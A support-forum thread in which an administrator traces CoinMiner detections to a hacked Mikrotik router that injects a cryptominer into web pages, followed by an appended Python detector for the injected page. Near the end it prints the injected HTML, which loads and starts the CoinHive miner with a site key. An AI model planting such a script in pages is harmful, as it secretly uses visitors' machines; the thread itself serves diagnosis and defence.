MAGIK José Rocha, posted August 31, 2018

Hi,

We have a computer with more than 10,000 detected threats like the one below:

Threat: JS/CoinMiner.AH
Process: C:\Windows\System32\wscript.exe
Object: hxxp://10.100.1.254/adpb/registration?username=carlota&domain=MYDOM&hostname=TSDC10&action=login

Is this a sign that the computer is infected, or is this the result of attempts to infect it?

Note: The address 10.100.1.254 is a Mikrotik router and it is updated with the latest updates.
Marcos (Administrator), posted August 31, 2018

In this case it's probably a local infection because of the wscript.exe process. Please gather logs with ELC on that machine and provide me with the generated archive.
itman, posted August 31, 2018

You can find the source by creating a HIPS rule to block the startup of C:\Windows\System32\wscript.exe. Also make sure you log the event and set its type to "warning." This shouldn't cause any issues unless you have created any custom .js or .ws scripts.

If the HIPS log shows the source as svchost.exe, this could possibly indicate that a scheduled task is behind the activity. Unfortunately, the HIPS won't show which service is behind the activity.
MAGIK José Rocha (author), posted September 1, 2018

On 8/31/2018 at 2:39 PM, Marcos said:
In this case it's probably a local infection because of the wscript.exe process. Please gather logs with ESET Log Collector on that machine and provide me with the generated archive.

Here are the collected logs on the affected machine. Thanks for your help.

Attachment: ees_logs.zip
MAGIK José Rocha (author), posted September 3, 2018

I've been able to find the origin of these detections and have already solved the problem.

When I was trying to understand the origin of these trojans, I noticed that some of the addresses were legit and didn't raise any problems outside our client's network. So I started a search for some kind of proxy that could inject malicious code into legit HTTP pages, and found out that they had their Mikrotik router hacked to make every request to port 80 go through the web proxy on port 8080, where the malicious code was injected; it was then blocked later on the client machine.

The hack was possible because of this vulnerability in Mikrotik RouterOS: https://blog.mikrotik.com/security/winbox-vulnerability.html

I've changed every password, disabled the web proxy and deleted the firewall rule, so now everything is fine.

@itman, @Marcos Thanks for the tips
Marcos (Administrator), posted September 3, 2018

We appreciate your feedback, José. In other cases with different brands of routers, a factory reset followed by upgrading the firmware didn't help.
Marcos (Administrator), posted September 4, 2018

Here's a good write-up of exploitation of Mikrotik routers' web proxy feature: https://www.trustwave.com/Resources/SpiderLabs-Blog/Mass-MikroTik-Router-Infection-–-First-we-cryptojack-Brazil,-then-we-take-the-World-/
MAGIK José Rocha (author), posted September 4, 2018

Here is the HTML source for the page that runs the miner:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<title>"$(url)"</title>
<_script src="https://coinhive.com/lib/coinhive.min.js"></script>
<_script>
var miner = new CoinHive.Anonymous('ZopliillHRjWlp5B3JTrS4hKQP8jAKwp', {throttle: 0.2});
miner.start();
</script>
</head>
<frameset>
<frame src="$(url)"></frame>
</frameset>
</html>
Marcos (Administrator), posted September 4, 2018

20 minutes ago, MAGIK José Rocha said:
Here is the HTML source for the page that runs the miner:

Yes. That is exactly what triggers the detection, and a screenshot of this was also included in the write-up mentioned above.
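A defender-side check for the wrapper page shown in this thread, added here as an example and not code from any poster or from ESET: it parses a fetched HTML body and flags the three traits the injected page has (an external script from a known miner host, an inline miner start call, and a single-frame frameset that reloads the originally requested URL). The miner host list and the sample bodies are constructed for the example; the site key is a placeholder.

```python
"""Heuristic detector for the injected-miner wrapper page described in this thread."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Script hosts associated with the injected miner in this thread (extend as needed).
MINER_SCRIPT_HOSTS = {"coinhive.com"}


class _Walker(HTMLParser):
    def __init__(self):
        super().__init__()
        self.script_hosts = []   # hosts of external <script src=...>
        self.inline_script = []  # text of inline <script> blocks
        self.frame_srcs = []     # src of <frame>/<iframe>
        self.has_frameset = False
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.script_hosts.append(urlparse(a["src"]).hostname or "")
        elif tag == "frameset":
            self.has_frameset = True
        elif tag in ("frame", "iframe") and a.get("src"):
            self.frame_srcs.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline_script.append(data)


def analyze_page(html: str) -> dict:
    """Return indicators of the wrapper: miner script host, inline miner start,
    and a frameset that merely reloads the page the user actually asked for."""
    w = _Walker()
    w.feed(html)
    inline = " ".join(w.inline_script)
    r = {
        "miner_script_host": any(h in MINER_SCRIPT_HOSTS for h in w.script_hosts),
        "miner_inline_start": "CoinHive.Anonymous" in inline and ".start(" in inline,
        "frameset_wrapper": w.has_frameset and len(w.frame_srcs) == 1,
    }
    r["injected"] = r["miner_script_host"] and r["frameset_wrapper"]
    r["wrapped_url"] = w.frame_srcs[0] if w.frame_srcs else None
    return r


# Constructed sample modelled on the posted wrapper page (placeholder site key).
SAMPLE_INJECTED = """<html><head><script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('PLACEHOLDER_SITE_KEY', {throttle: 0.2}); miner.start();</script>
</head><frameset><frame src="http://example.com/"></frame></frameset></html>"""
SAMPLE_CLEAN = "<html><head><title>ok</title></head><body><p>hello</p></body></html>"
```

Fetching the same plain-HTTP page from inside and outside the suspect network and running both bodies through analyze_page is a quick way to confirm that the injection happens on the path rather than on the origin server.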